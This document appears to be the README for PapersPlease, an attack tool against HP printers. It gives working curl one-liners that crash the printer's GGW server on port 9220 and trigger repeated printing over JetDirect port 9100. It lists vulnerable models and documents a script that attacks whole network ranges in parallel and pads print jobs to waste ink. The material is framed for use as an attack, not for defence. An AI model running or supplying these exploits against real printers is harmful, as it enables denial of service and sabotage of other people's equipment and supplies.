PapersPlease is an exploit that allows an attacker to perform a Denial of Service against an HP printer by crashing the internal GGW server.
NOTE:
It is unknown at this time if GGW Version 2.0 is vulnerable to this exploit.
The Denial of Service exploit is as follows:
curl IP:9220 -X 'open 99999999'
Whats happening here is we are telling the internal GGW server to retrieve the process name running on index number 99999999. However, upon receiving the request the GGW server will instantly crash. In addition, any index number 8 or 9 digits in length also causes the GGW server to crash.
The mass-print exploit is as follows:
curl IP:9100 -m 1 -X 'Foo Bar'
When abusing the JetDirect protocol, PapersPlease will connect to port 9100 on the remote host, then immediately disconnect. Which in some cases causes a document to be printed. With this exploit an attacker can print hundreds of copies from any vulnerable printer, wasting paper and ink.
| Model | DoS | Mass Print | GGW Version |
|---|---|---|---|
| HP Envy 7640 | True | False | Version: 1.0 |
| HP OfficeJet Pro 6978 | True | True | Version: 1.0 |
NOTE:
While the above list provides known exploitable models, these do not need to be known prior to attacking.
You will need to install parallel from your respective package manager.
apt install parallel
Along with Parallel, Android users will need to install Termux from the Google Play Store.
./Papers_Please.sh [OPTION]
OPTION: DESCRIPTION:
-t, --target {IP} Specify a specific
target rather than
multiple.
-n, --network {IP/CIDR} Manually specify
an address range
to attack.
--print {N} Number of jobs to
send to the printer.
If vulnerable, will
cause N number of
pages to be printed.
-m, --message {STRING} Send a custom message
to the printer when
performing a mass-
print attack. It
is important to have
the string within
DOUBLE QUOTES.
Default message
is "foo-bar".
--ink [N] Adds N number of
pound signs (#)
to the print job.
This option is used
to make a printer
waste a large amount
of ink. Default value
is 5500.
-i, --interval {N} The interval before
another job is sent
to the printer. Where
N can be a decimal
i.e. 0.1 or a whole
number. The default
interval is 1.
-j, --jobs {-N|+N|N%|N} Run N number of
jobs in parallel.
Defaults to 0.
-p, --proc {-N|+N|N%|N} Define the maximum
N number of processes
that can be active at
a time. Defaults to 1.
-s, --slots {-N|+N|N%|N} The N number
of file handles
available to be
used by parallel
for jobs. Default
is 250.
-P, --port {PORT} Specify a specific
port. Useful for
port-forwarded
hosts. Port number
is set automatically
based on the attack
being preformed.
PORT can be any
number ranging
from 1 to 65535.
--no-scan Disables the automatic
printer discovery
scan. By disabling
this function the
attacker might not
know how many hosts
were successfully
brought down. Also,
no scan will be
performed when
the --target or
--ink flag(s)
are specified.
--no-check Will skip dependency
checking.
-q, --quiet Suppress output to
terminal. Only the
progress bar from
parallel will be
printed in this
mode.
-v, --version Print version
information
then exit.
-h, --help Print help
dialog then
exit.